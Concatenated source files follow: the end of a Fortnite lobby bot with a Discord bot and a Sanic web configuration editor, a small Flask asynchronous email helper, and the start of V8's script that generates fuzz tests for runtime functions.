if not user:
send(dclient_user,l('discord_owner_notfound',owner),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
else:
dclient.owner.append(user)
send(dclient_user,f"{l('owner')}: {name(user)}",green,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}')
lists = {
"blacklist_": "blacklist",
"whitelist_": "whitelist"
}
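# Helper that resolves one Discord user id. list_ and data_ are read from
# the for loop below at call time, and _ is only awaited inside that loop,
# so both names are always bound; resolved ids are appended to the
# module-level blacklist_/whitelist_ via globals().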
async def _(listuser: str) -> None:
listuser = int(listuser)
user = dclient.get_user(listuser)
if not user:
try:
user = await dclient.fetch_user(listuser)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l(f'discord_{data_}_user_notfound', listuser),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
return
globals()[list_].append(user.id)
for list_,data_ in lists.items():
await asyncio.gather(*[_(listuser) for listuser in data['discord'][data_]])
if data['loglevel'] == "debug":
send(dclient_user,f"discord {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
@dclient.event
async def on_message(message: discord.Message) -> None:
await process_command(message)
async def change_status() -> None:
var = defaultdict(lambda: None)
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"guild_count": len(dclient.guilds),
"get_guild_member_count": get_guild_member_count,
"boot_time": int(time.time() - dclient.boot_time)
}
)
activity = discord.Activity(name=eval_format(data['discord']['status'],var),type=data['discord']['status_type'])
await dclient.change_presence(activity=activity)
async def status_loop() -> None:
while True:
try:
await change_status()
except Exception:
send(dclient.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await asyncio.sleep(30)
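# Option tables for the web config editor: each select() lists the values a
# field may take together with their localized display names.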
select_bool = select(
[
{"value": "True","display_value": l('bool_true')},
{"value": "False","display_value": l('bool_false')}
]
)
select_bool_none = select(
[
{"value": "True","display_value": l('bool_true')},
{"value": "False","display_value": l('bool_false')},
{"value": "None","display_value": l('bool_none')}
]
)
select_platform = select(
[
{"value": "WIN","display_value": "Windows"},
{"value": "MAC","display_value": "Mac"},
{"value": "PSN","display_value": "PlayStation"},
{"value": "XBL","display_value": "Xbox"},
{"value": "SWT","display_value": "Switch"},
{"value": "IOS","display_value": "IOS"},
{"value": "AND","display_value": "Android"}
]
)
select_privacy = select(
[
{"value": i,"display_value": l(i)} for i in ["public","friends_allow_friends_of_friends","friends","private_allow_friends_of_friends","private"]
]
)
select_status = select(
[
{"value": i,"display_value": l(i)} for i in ["playing","listening","watching"]
]
)
select_matchmethod = select(
[
{"value": i,"display_value": l(i)} for i in ["full","contains","starts","ends"]
]
)
select_loglevel = select(
[
{"value": "normal","display_value": l('normal')},
{"value": "info","display_value": l('info')},
{"value": "debug","display_value": l('debug')}
]
)
select_lang = select(
[
{"value": re.sub(r"lang(\\|/)","",i).replace(".json",""),"display_value": re.sub(r"lang(\\|/)","",i).replace(".json","")} for i in glob("lang/*.json") if "_old.json" not in i
]
)
select_ben_lang = select(
[
{"value": i,"display_value": i} for i in ["ar","de","en","es","es-419","fr","it","ja","ko","pl","pt-BR","ru","tr","zh-CN","zh-Hant"]
]
)
converter = {
"can_be_multiple": CanBeMultiple,
"can_linebreak": CanLinebreak,
"select_bool": select_bool,
"select_bool_none": select_bool_none,
"select_platform": select_platform,
"select_privacy" :select_privacy,
"select_status": select_status,
"select_loglevel": select_loglevel,
"select_lang": select_lang,
"select_ben_lang": select_ben_lang,
"select_matchmethod": select_matchmethod,
"red": Red,
"fix_required": FixRequired
}
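# Swap the marker strings in both tag tables for their classes/instances so
# the handlers and templates can test membership with "X in tags".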
for key,value in config_tags.items():
for count,tag in enumerate(value):
config_tags[key][count] = converter.get(tag,tag)
for key,value in commands_tags.items():
for count,tag in enumerate(value):
commands_tags[key][count] = converter.get(tag,tag)
if True: #Web
@app.route("/favicon.ico", methods=["GET"])
async def favicon(request: Request):
return sanic.response.redirect("/images/icon.png")
if os.environ.get("FORTNITE_LOBBYBOT_STATUS") == "-1":
@app.route("/", methods=["GET"])
async def main(request: Request):
return sanic.response.html(
"<h2>Fortnite-LobbyBot<h2>"
"<p>初めに<a href='https://github.com/gomashio1596/Fortnite-LobbyBot/blob/master/README.md' target='_blank'>README</a>をお読みください</p>"
"<p>First, please read <a href='https://github.com/gomashio1596/Fortnite-LobbyBot/blob/master/README_EN.md' target='_blank'>README<a/></p>"
"<p>質問などは私(Twitter @gomashio1596 Discord gomashio#4335)か<a href='https://discord.gg/NEnka5N' target='_blank'>Discordサーバー</a>まで</p>"
"<p>For questions, Contact to me(Twitter @gomashio1596 Discord gomashio#4335) or ask in <a href='https://discord.gg/NEnka5N' target='_blank'>Discord server</a></p>"
"<p><a href='https://glitch.com/edit/#!/remix/fortnite-lobbybot' target='_blank'>ここをクリック</a>してRemix</p>"
"<p><a href='https://glitch.com/edit/#!/remix/fortnite-lobbybot' target='_blank'>Click here</a> to Remix</p>"
"<a href='https://discord.gg/NEnka5N' target='_blank'><img src='https://discordapp.com/api/guilds/718709023427526697/widget.png?style=banner1'></img></a>"
)
elif data["status"] == 0:
@app.route("/", methods=["GET", "POST"])
async def main(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("config.json")
return render_template(
"config_editor.html",
l=l,
data=data,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
flag = False
raw = request.form
data = load_json("config.json")
corrected = data
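# Rebuild the nested config from the flat form fields. Each config_tags key
# such as "['web']['port']" is split into its path segments; nest is the
# depth (1 or 2). corrected deliberately aliases data so keys absent from
# the form keep their loaded values.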
for key_,tags in config_tags.items():
keys = key_.replace("'","").replace("[","").split("]")
key = keys[0]
nest = len(keys) - 1
if nest == 1:
if dict in tags:
if not corrected.get(key):
corrected[key] = {}
else:
value = raw.get(f"['{key}']")
if FixRequired in tags and value == corrected.get(key):
flash_messages_red.append(l('this_field_fix_required', key))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key] = re.split(r'\r\n|\n',value) if value else []
elif int in tags:
corrected[key] = [int(i) for i in re.split(r'\r\n|\n',value)] if value else []
elif str in tags:
corrected[key] = value.replace(r"\\n",r"\n").replace(r"\n","\n") if value else ""
elif int in tags:
corrected[key] = int(value) if value else 0
elif bool_ in tags:
corrected[key] = bool_.create(value)
elif bool_none in tags:
corrected[key] = bool_none.create(value)
elif nest == 2:
key2 = keys[1]
if dict in tags:
    if not corrected.get(key):
        corrected[key] = {}
    if not corrected[key].get(key2):
        corrected[key][key2] = {}
else:
value2 = raw.get(f"['{key}']['{key2}']")
if FixRequired in tags and value2 == corrected.get(key,{}).get(key2):
flash_messages_red.append(l('this_field_fix_required', f"{key}: {key2}"))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key][key2] = re.split(r'\r\n|\n',value2) if value2 else []
elif int in tags:
corrected[key][key2] = [int(i) for i in re.split(r'\r\n|\n',value2)] if value2 else []
elif str in tags:
corrected[key][key2] = value2.replace(r"\\n",r"\n").replace(r"\n","\n") if value2 else ""
elif int in tags:
corrected[key][key2] = int(value2) if value2 else 0
elif bool_ in tags:
corrected[key][key2] = bool_.create(value2)
elif bool_none in tags:
corrected[key][key2] = bool_none.create(value2)
if flag:
return render_template(
"config_editor.html",
l=l,
data=data,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
corrected["status"] = 1
with open('config.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
Thread(target=restart,args=(1,)).start()
return sanic.response.redirect("/")
else:
@app.route("/", methods=["GET", "POST"])
async def main(request: Request):
if request.method == "GET":
return render_template(
"main.html",
l=l,
authenticated=auth.authenticated(request),
data=data
)
elif request.method == "POST":
if auth.authenticated(request):
Thread(target=restart,args=(1,)).start()
return sanic.response.redirect("/")
@app.route("/login", methods=["GET", "POST"])
async def login(request: Request):
if auth.authenticated(request):
return sanic.response.redirect("/")
else:
flash_messages = []
if request.method == "GET":
return render_template("login.html", l=l, flash_messages=flash_messages)
elif request.method == "POST":
if request.form.get("password","") == data["web"]["password"]:
r = sanic.response.redirect("/")
auth.login_user(request, r)
return r
else:
flash_messages.append(l('invalid_password'))
return render_template("login.html", l=l, flash_messages=flash_messages)
@app.route("/text")
@auth.login_required
async def web_text_(request: Request):
return sanic.response.json(
{
"text": web_text
}
)
@app.route("/logout")
@auth.login_required
async def logout(request: Request):
r = sanic.response.redirect("/")
auth.logout_user(request, r)
return r
@app.route("/config_editor", methods=["GET", "POST"])
@auth.login_required
async def config_editor(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("config.json")
return render_template(
"config_editor.html",
l=l,
data=data,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
flag = False
raw = request.form
data = load_json("config.json")
corrected = data
for key_,tags in config_tags.items():
keys = key_.replace("'","").replace("[","").split("]")
key = keys[0]
nest = len(keys) - 1
if nest == 1:
if dict in tags:
if not corrected.get(key):
corrected[key] = {}
else:
value = raw.get(f"['{key}']")
if FixRequired in tags and value == corrected.get(key):
flash_messages_red.append(l('this_field_fix_required', key))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key] = re.split(r'\r\n|\n',value) if value else []
elif int in tags:
corrected[key] = [int(i) for i in re.split(r'\r\n|\n',value)] if value else []
elif str in tags:
corrected[key] = value.replace(r"\\n",r"\n").replace(r"\n","\n") if value else ""
elif int in tags:
corrected[key] = int(value) if value else 0
elif bool_ in tags:
corrected[key] = bool_.create(value)
elif bool_none in tags:
corrected[key] = bool_none.create(value)
elif nest == 2:
key2 = keys[1]
if dict in tags:
    if not corrected.get(key):
        corrected[key] = {}
    if not corrected[key].get(key2):
        corrected[key][key2] = {}
else:
value2 = raw.get(f"['{key}']['{key2}']")
if FixRequired in tags and value2 == corrected.get(key,{}).get(key2):
flash_messages_red.append(l('this_field_fix_required', f"{key}: {key2}"))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key][key2] = re.split(r'\r\n|\n',value2) if value2 else []
elif int in tags:
corrected[key][key2] = [int(i) for i in re.split(r'\r\n|\n',value2)] if value2 else []
elif str in tags:
corrected[key][key2] = value2.replace(r"\\n",r"\n").replace(r"\n","\n") if value2 else ""
elif int in tags:
corrected[key][key2] = int(value2) if value2 else 0
elif bool_ in tags:
corrected[key][key2] = bool_.create(value2)
elif bool_none in tags:
corrected[key][key2] = bool_none.create(value2)
if flag:
return render_template(
"config_editor.html",
l=l,
data=corrected,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
corrected["status"] = 1
with open('config.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
if raw.get("reload"):
Thread(target=restart, args=(1,)).start()
return sanic.response.redirect("/")
else:
flash_messages.append(l('web_saved'))
return render_template(
"config_editor.html",
l=l,
data=corrected,
config_tags=config_tags,
len=len,
join=str.join,
split=str.split,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
@app.route("/commands_editor", methods=["GET", "POST"])
@auth.login_required
async def commands_editor(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("commands.json")
return render_template(
"commands_editor.html",
l=l,
data=data,
commands_tags=commands_tags,
len=len,
join=str.join,
split=str.split,
type=type,
can_be_multiple=CanBeMultiple,
select=select,
str=str,
int=int,
bool=bool,
list=list,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
elif request.method == "POST":
flag = False
raw = request.form
data = load_json("commands.json")
corrected = data
for key_,tags in commands_tags.items():
keys = key_.replace("'","").replace("[","").split("]")
key = keys[0]
nest = len(keys) - 1
if nest == 1:
if dict in tags:
if not corrected.get(key):
corrected[key] = {}
else:
value = raw.get(f"['{key}']")
if FixRequired in tags and value == corrected.get(key):
flash_messages_red.append(l('this_field_fix_required', key))
flag = True
corrected[key] = re.split(r'\r\n|\n',value) if value else []
if flag:
return render_template(
"commands_editor.html",
l=l,
data=corrected,
commands_tags=commands_tags,
len=len,
join=str.join,
split=str.split,
type=type,
can_be_multiple=CanBeMultiple,
select=select,
str=str,
int=int,
bool=bool,
list=list,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
with open('commands.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
if raw.get("reload"):
Thread(target=restart, args=(1,)).start()
return sanic.response.redirect("/")
else:
flash_messages.append(l('web_saved'))
return render_template(
"commands_editor.html",
l=l,
data=corrected,
commands_tags=commands_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
select=select,
str=str,
int=int,
bool=bool,
list=list,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
@app.route("/replies_editor", methods=["GET", "POST"])
@auth.login_required
async def replies_editor(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("replies.json")
return render_template(
"replies_editor.html",
l=l,
data=data,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red,
len=len,
enumerate=enumerate,
str=str
)
elif request.method == "POST":
raw = request.form
corrected = {}
for num in range(0,int(raw["number"][0])):
trigger = raw.get(f"trigger{str(num)}")
if not trigger:
flash_messages_red.append(l('cannot_be_empty'))
break
content = raw.get(f"content{str(num)}")
if not content:
flash_messages_red.append(l('cannot_be_empty'))
break
corrected[trigger] = content
with open('replies.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
if raw.get("reload"):
Thread(target=restart, args=(1,)).start()
return sanic.response.redirect("/")
else:
flash_messages.append(l('web_saved'))
return render_template(
"replies_editor.html",
l=l,
data=corrected,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red,
len=len,
enumerate=enumerate,
str=str
)
@app.route("/party_viewer", methods=["GET"])
@auth.login_required
async def party_viewer(request: Request):
return render_template(
"party_viewer.html",
l=l,
clients=clients,
enumerate=enumerate
)
@app.route("/clients<num>", methods=["GET", "POST"])
@auth.login_required
async def clients_viewer(request: Request, num: str):
num = int(num)
client = clients[num] if clients[num:num+1] else None
if not client:
sanic.exceptions.abort(404)
flash_messages = []
if request.method == "GET":
return render_template(
"clients_viewer.html",
l=l,
client=client,
none=None,
len=len,
flash_messages=flash_messages
)
else:
if request.form.get("command"):
content = request.form["command"][0] if isinstance(request.form["command"],list) else request.form["command"]
message = WebMessage(content, request.cookies.get(auth.cookie_key, 'NoID'), client)
await process_command(message)
result = message.result
if result:
for mes in message.result:
for m in mes.split('\n'):
flash_messages.append(m)
return render_template(
"clients_viewer.html",
l=l,
client=client,
none=None,
len=len,
flash_messages=flash_messages
)
else:
return sanic.response.redirect(f"/clients{num}")
@app.route("/clients_info/<num>", methods=["GET"])
@auth.login_required
async def clients_info(request: Request, num: str):
num = int(num)
client = clients[num] if len(clients[num:num+1]) == 1 else None
if not client:
return sanic.response.json(
{
"error": "account_not_exists"
}
)
elif not client.isready:
return sanic.response.json(
{
"error": "account_not_loaded"
}
)
elif not client.party or not client.party.me:
return sanic.response.json(
{
"error": "party_moving"
}
)
else:
return sanic.response.json(
{
"display_name": client.user.display_name,
"id": client.user.id,
"leader": client.party.me.leader,
"banner": search_banner(client.party.me.banner[0]),
"level": client.party.me.banner[2],
"outfit": member_asset(client.party.me, "outfit"),
"outfit_variants": client.party.me.outfit_variants,
"backpack": member_asset(client.party.me, "backpack"),
"backpack_variants": client.party.me.backpack_variants,
"pickaxe": member_asset(client.party.me, "pickaxe"),
"pickaxe_variants": client.party.me.pickaxe_variants,
"contrail": member_asset(client.party.me, "contrail"),
"emote": member_asset(client.party.me, "emote"),
"party_id": client.party.id,
"members": [
{
"display_name": i.display_name,
"id": i.id,
"leader": i.leader,
"banner": search_banner(i.banner[0]),
"level": i.banner[2],
"outfit": member_asset(i, "outfit"),
"outfit_variants": i.outfit_variants,
"backpack": member_asset(i, "backpack"),
"backpack_variants": i.backpack_variants,
"pickaxe": member_asset(i, "pickaxe"),
"pickaxe_variants": i.pickaxe_variants,
"contrail": member_asset(i, "contrail"),
"emote": member_asset(i, "emote")
} for i in client.party.members
]
}
)
@app.route("/boot_switch", methods=["GET", "POST"])
@auth.login_required
async def boot_switch(request: Request):
if request.method == "GET":
return render_template(
"boot_switch.html",
l=l,
len=len
)
elif request.method == "POST":
raw = request.form
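# Form keys look like "on0" or "off3": the action plus the client index.
# Take the first matching key, then split it back into both parts.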
for i in raw.keys():
if "on" in i or "off" in i:
break
on_or_off = i
num = int(re.sub(r"on|off","", on_or_off))
on_or_off = i.replace(str(num),"")
loop = asyncio.get_event_loop()
if on_or_off == "on":
clients[num].booting = True
loop.create_task(clients[num].start())
elif on_or_off == "off":
loop.create_task(clients[num].close())
return sanic.response.redirect("/boot_switch")
@app.route("/boot_info", methods=["GET"])
@auth.login_required
async def boot_info(request: Request):
data = {}
for client in clients:
if not client.booting and not client.isready:
data[client.email] = {
"info": "info_closed",
"booting": client.booting,
"isready": client.isready
}
elif client.booting:
data[client.email] = {
"info": "info_booting",
"booting": client.booting,
"isready": client.isready
}
elif client.isready:
data[client.email] = {
"info": "info_ready",
"booting": client.booting,
"isready": client.isready
}
return sanic.response.json(data)
@app.exception(sanic.exceptions.NotFound)
async def not_found(request: Request, exception: Exception):
return render_template("not_found.html", l=l)
@auth.no_auth_handler
async def unauthorized(request: Request, *args, **kwargs):
return sanic.response.redirect("/")
loop = asyncio.get_event_loop()
if data.get('web',{}).get('enabled',True) is True or data.get('status',1) == 0:
loop.create_task(run_app())
Thread(target=dprint,args=(),daemon=True).start()
Thread(target=store_banner_data).start()
if data.get("status",1) != 0:
try:
langs = [
data["search-lang"],
data["sub-search-lang"]
] if data["sub-search-lang"] and data["sub-search-lang"] != data["search-lang"] else [
data["search-lang"]
]
store_item_data(langs)
except Exception:
send(l('bot'),l('api_downing'),red)
langs = [
data["search-lang"],
data["sub-search-lang"]
] if data["sub-search-lang"] and data["sub-search-lang"] != data["search-lang"] else [
data["search-lang"]
]
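# Resolve the configured cosmetics concurrently: one lookup per language,
# per match mode (name/id) and per item group; the first successful result
# for each group wins.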
items = {}
styles = {}
with ThreadPoolExecutor() as executor:
items_futures = {executor.submit(search_item,lang,mode,data['fortnite'][type_.split(',')[0]],",".join(convert_to_new_type(i) for i in type_.split(','))): type_.split(',')[0] for lang in langs for mode in ("name","id") for type_ in ("outfit","backpack,pet","pickaxe","emote,emoji,toy")}
for future,type_ in items_futures.items():
result = future.result()
if result and not items.get(type_):
items[type_] = result[0]
with ThreadPoolExecutor() as executor:
styles_futures = {executor.submit(search_style,data["search-lang"],items.get(type_.split(',')[0],{}).get("id"),",".join(convert_to_new_type(i) for i in type_.split(','))): type_.split(',')[0] for type_ in ("outfit","backpack,pet","pickaxe") if data["fortnite"][f"{type_.split(',')[0]}_style"]}
for future,type_ in styles_futures.items():
result = future.result()
if result and not styles.get(type_):
variants = [i["variants"] for i in result if data["fortnite"][f"{type_}_style"] in i["name"]]
if variants:
styles[type_] = variants[0]
for email in data["fortnite"]["email"]:
email = email.strip()
try:
device_auth_details = get_device_auth_details().get(email.lower(), {})
if not device_auth_details:
device_auth_details = loop.run_until_complete(generate_device_auth_and_store(email))
client = Client(
auth=fortnitepy.DeviceAuth(
**device_auth_details
),
default_party_config=fortnitepy.DefaultPartyConfig(
privacy=data['fortnite']['privacy']
),
default_party_member_config=fortnitepy.DefaultPartyMemberConfig(
meta=[
partial(ClientPartyMember.set_outfit, items.get("outfit",{}).get("id",data["fortnite"]["outfit"]), variants=styles.get("outfit")),
partial(ClientPartyMember.set_backpack, items.get("backpack",{}).get("id",data["fortnite"]["backpack"]), variants=styles.get("backpack")),
partial(ClientPartyMember.set_pickaxe, items.get("pickaxe",{}).get("id",data["fortnite"]["pickaxe"]), variants=styles.get("pickaxe")),
partial(ClientPartyMember.set_battlepass_info, has_purchased=True, level=data['fortnite']['tier'], self_boost_xp=data['fortnite']['xpboost'], friend_boost_xp=data['fortnite']['friendxpboost']),
partial(ClientPartyMember.set_banner, icon=data['fortnite']['banner'], color=data['fortnite']['banner_color'], season_level=data['fortnite']['level'])
]
),
platform=fortnitepy.Platform(data['fortnite']['platform'].upper()),
emote=items.get("emote",{}).get("id",data["fortnite"]["emote"])
)
except ValueError:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),l('error_while_setting_client'),red,add_d=lambda x:f'>>> {x}')
continue
clients.append(client)
if data.get('status',1) != 0 and bot_ready:
loop.create_task(run_bot())
try:
loop.run_forever()
except KeyboardInterrupt:
sys.exit(1)
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message  # the flask.ext.* namespace was removed in Flask 1.0
from . import mail
from app.tool.send_mail import send_163  # importing send_email here would be shadowed by the definition below
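# Sending happens on a worker thread, which needs its own application
# context: current_app is a proxy bound only to the thread handling the
# request.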
def send_async_email(app, msg):
with app.app_context():
send_163(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
generate-runtime-tests.py
|
#!/usr/bin/env python
# Copyright 2014 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import itertools
import js2c
import multiprocessing
import optparse
import os
import random
import re
import shutil
import signal
import string
import subprocess
import sys
import time
FILENAME = "src/runtime.cc"
HEADERFILENAME = "src/runtime.h"
FUNCTION = re.compile(r"^RUNTIME_FUNCTION\(Runtime_(\w+)")
ARGSLENGTH = re.compile(r".*ASSERT\(.*args\.length\(\) == (\d+)\);")
FUNCTIONEND = "}\n"
MACRO = re.compile(r"^#define ([^ ]+)\(([^)]*)\) *([^\\]*)\\?\n$")
FIRST_WORD = re.compile(r"^\s*(.*?)[\s({\[]")
WORKSPACE = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), ".."))
BASEPATH = os.path.join(WORKSPACE, "test", "mjsunit", "runtime-gen")
THIS_SCRIPT = os.path.relpath(sys.argv[0])
# Expand these macros, they define further runtime functions.
EXPAND_MACROS = [
"BUFFER_VIEW_GETTER",
"DATA_VIEW_GETTER",
"DATA_VIEW_SETTER",
"RUNTIME_UNARY_MATH",
]
# TODO(jkummerow): We could also whitelist the following macros, but the
# functions they define are so trivial that it's unclear how much benefit
# that would provide:
# ELEMENTS_KIND_CHECK_RUNTIME_FUNCTION
# FIXED_TYPED_ARRAYS_CHECK_RUNTIME_FUNCTION
# TYPED_ARRAYS_CHECK_RUNTIME_FUNCTION
# Counts of functions in each detection state. These are used to assert
# that the parser doesn't bit-rot. Change the values as needed when you add,
# remove or change runtime functions, but make sure we don't lose our ability
# to parse them!
EXPECTED_FUNCTION_COUNT = 358
EXPECTED_FUZZABLE_COUNT = 326
EXPECTED_CCTEST_COUNT = 6
EXPECTED_UNKNOWN_COUNT = 4
EXPECTED_BUILTINS_COUNT = 800
# Don't call these at all.
BLACKLISTED = [
"Abort", # Kills the process.
"AbortJS", # Kills the process.
"CompileForOnStackReplacement", # Riddled with ASSERTs.
"IS_VAR", # Not implemented in the runtime.
"ListNatives", # Not available in Release mode.
"SetAllocationTimeout", # Too slow for fuzzing.
"SystemBreak", # Kills (int3) the process.
# These are weird. They violate some invariants when called after
# bootstrapping.
"DisableAccessChecks",
"EnableAccessChecks",
# The current LiveEdit implementation relies on and messes with internals
# in ways that makes it fundamentally unfuzzable :-(
"DebugGetLoadedScripts",
"DebugSetScriptSource",
"LiveEditFindSharedFunctionInfosForScript",
"LiveEditFunctionSourceUpdated",
"LiveEditGatherCompileInfo",
"LiveEditPatchFunctionPositions",
"LiveEditReplaceFunctionCode",
"LiveEditReplaceRefToNestedFunction",
"LiveEditReplaceScript",
"LiveEditRestartFrame",
"SetScriptBreakPoint",
# TODO(jkummerow): Fix these and un-blacklist them!
"CreateDateTimeFormat",
"CreateNumberFormat",
]
# These will always throw.
THROWS = [
"CheckExecutionState", # Needs to hit a break point.
"CheckIsBootstrapping", # Needs to be bootstrapping.
"DebugEvaluate", # Needs to hit a break point.
"DebugEvaluateGlobal", # Needs to hit a break point.
"DebugIndexedInterceptorElementValue", # Needs an indexed interceptor.
"DebugNamedInterceptorPropertyValue", # Needs a named interceptor.
"DebugSetScriptSource", # Checks compilation state of script.
"GetAllScopesDetails", # Needs to hit a break point.
"GetFrameCount", # Needs to hit a break point.
"GetFrameDetails", # Needs to hit a break point.
"GetRootNaN", # Needs to be bootstrapping.
"GetScopeCount", # Needs to hit a break point.
"GetScopeDetails", # Needs to hit a break point.
"GetStepInPositions", # Needs to hit a break point.
"GetTemplateField", # Needs a {Function,Object}TemplateInfo.
"GetThreadCount", # Needs to hit a break point.
"GetThreadDetails", # Needs to hit a break point.
"IsAccessAllowedForObserver", # Needs access-check-required object.
"UnblockConcurrentRecompilation" # Needs --block-concurrent-recompilation.
]
# Definitions used in CUSTOM_KNOWN_GOOD_INPUT below.
_BREAK_ITERATOR = (
"%GetImplFromInitializedIntlObject(new Intl.v8BreakIterator())")
_COLLATOR = "%GetImplFromInitializedIntlObject(new Intl.Collator('en-US'))"
_DATETIME_FORMAT = (
"%GetImplFromInitializedIntlObject(new Intl.DateTimeFormat('en-US'))")
_NUMBER_FORMAT = (
"%GetImplFromInitializedIntlObject(new Intl.NumberFormat('en-US'))")
# Custom definitions for function input that does not throw.
# Format: "FunctionName": ["arg0", "arg1", ..., argslength].
# None means "fall back to autodetected value".
CUSTOM_KNOWN_GOOD_INPUT = {
"Apply": ["function() {}", None, None, None, None, None],
"ArrayBufferSliceImpl": [None, None, 0, None],
"ArrayConcat": ["[1, 'a']", None],
"BreakIteratorAdoptText": [_BREAK_ITERATOR, None, None],
"BreakIteratorBreakType": [_BREAK_ITERATOR, None],
"BreakIteratorCurrent": [_BREAK_ITERATOR, None],
"BreakIteratorFirst": [_BREAK_ITERATOR, None],
"BreakIteratorNext": [_BREAK_ITERATOR, None],
"CompileString": [None, "false", None],
"CreateBreakIterator": ["'en-US'", "{type: 'string'}", None, None],
"CreateJSFunctionProxy": [None, "function() {}", None, None, None],
"CreatePrivateSymbol": ["\"foo\"", None],
"CreateSymbol": ["\"foo\"", None],
"DateParseString": [None, "new Array(8)", None],
"DefineOrRedefineAccessorProperty": [None, None, "function() {}",
"function() {}", 2, None],
"FunctionBindArguments": [None, None, "undefined", None, None],
"GetBreakLocations": [None, 0, None],
"GetDefaultReceiver": ["function() {}", None],
"GetImplFromInitializedIntlObject": ["new Intl.NumberFormat('en-US')", None],
"InternalCompare": [_COLLATOR, None, None, None],
"InternalDateFormat": [_DATETIME_FORMAT, None, None],
"InternalDateParse": [_DATETIME_FORMAT, None, None],
"InternalNumberFormat": [_NUMBER_FORMAT, None, None],
"InternalNumberParse": [_NUMBER_FORMAT, None, None],
"IsSloppyModeFunction": ["function() {}", None],
"LoadMutableDouble": ["{foo: 1.2}", None, None],
"NewObjectFromBound": ["(function() {}).bind({})", None],
"NumberToRadixString": [None, "2", None],
"ParseJson": ["\"{}\"", 1],
"RegExpExecMultiple": [None, None, "['a']", "['a']", None],
"SetAccessorProperty": [None, None, "undefined", "undefined", None, None],
"SetIteratorInitialize": [None, None, "2", None],
"SetDebugEventListener": ["undefined", None, None],
"SetFunctionBreakPoint": [None, 200, None, None],
"StringBuilderConcat": ["[1, 2, 3]", 3, None, None],
"StringBuilderJoin": ["['a', 'b']", 4, None, None],
"StringMatch": [None, None, "['a', 'b']", None],
"StringNormalize": [None, 2, None],
"StringReplaceGlobalRegExpWithString": [None, None, None, "['a']", None],
"TypedArrayInitialize": [None, 6, "new ArrayBuffer(8)", None, 4, None],
"TypedArrayInitializeFromArrayLike": [None, 6, None, None, None],
"TypedArraySetFastCases": [None, None, "0", None],
}
# Types of arguments that cannot be generated in a JavaScript testcase.
NON_JS_TYPES = [
"Code", "Context", "FixedArray", "FunctionTemplateInfo",
"JSFunctionResultCache", "JSMessageObject", "Map", "ScopeInfo",
"SharedFunctionInfo"]
class Generator(object):
def RandomVariable(self, varname, vartype, simple):
if simple:
return self._Variable(varname, self.GENERATORS[vartype][0])
